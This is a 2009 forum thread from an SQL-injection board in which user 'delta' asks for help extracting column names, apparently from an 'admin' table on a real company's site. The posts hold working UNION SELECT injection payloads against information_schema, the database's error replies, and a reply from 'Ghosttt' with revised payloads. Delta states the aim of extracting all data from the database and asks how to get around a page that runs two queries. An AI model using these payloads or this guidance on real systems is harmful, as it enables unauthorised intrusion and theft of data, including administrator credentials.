|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Not retrieving columns |
|
Posted: Sun Sep 13, 2009 8:58 pm |
|
|
delta |
Advanced user |
|
|
Joined: Jan 11, 2009 |
Posts: 60 |
|
|
|
|
|
|
|
Well, I succeeded in this injection. But the problem is: I can't get the column names.
When I try:
Code: | id=6672+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14%20from%20information_schema.columns%20where%20table_name=%27admin%27%20limit%201,5/* |
I get:
Code: | The used SELECT statements have a different number of columns. |
So I tried
Code: | id=-1%20UNION%20SELECT%20NULL%20FROM%20admin%20LIMIT%200,1%20/* |
But It keeps saying that the table doesn't exist.
Code: | Table 'mhp_DBcompany.admin' doesn't exist |
It makes some time I dont deal with MySQL Injection, can't remember anything to do now. Any idea?:S |
|
|
|
|
Posted: Tue Sep 15, 2009 5:30 pm |
|
|
delta |
Advanced user |
|
|
Joined: Jan 11, 2009 |
Posts: 60 |
|
|
|
|
|
|
|
BUMP, Someone? |
|
|
|
|
|
Re: Not retrieving columns |
|
Posted: Mon Oct 19, 2009 7:59 pm |
|
|
Ghosttt |
Beginner |
|
|
Joined: Sep 19, 2009 |
Posts: 1 |
|
|
|
|
|
|
|
delta wrote: |
When I try:
Code: | id=6672+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14%20from%20information_schema.columns%20where%20table_name=%27admin%27%20limit%201,5/* |
So I tried
Code: | id=-1%20UNION%20SELECT%20NULL%20FROM%20admin%20LIMIT%200,1%20/* |
|
try this:
Code: |
http://www.id=6672+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14 +from+information_schema.columns+where+table_name=admin-- |
or just
Code: | http://www.id=6672+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14 from information_schema.columns where table_name=admin limit 1,5/* |
|
|
|
|
|
|
|
|
|
Posted: Wed Oct 21, 2009 7:16 pm |
|
|
delta |
Advanced user |
|
|
Joined: Jan 11, 2009 |
Posts: 60 |
|
|
|
|
|
|
|
Hello Ghosttt, I already find out the problem.
The page is running 2 querys, so I can't get the columns visual feedback because keep getting wrong number of columns.
Use blind is not viable, since I want to extract all the data from database.
Is there any way to bypass even with 2 querys running?!
Waraxe, give me a light pls |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|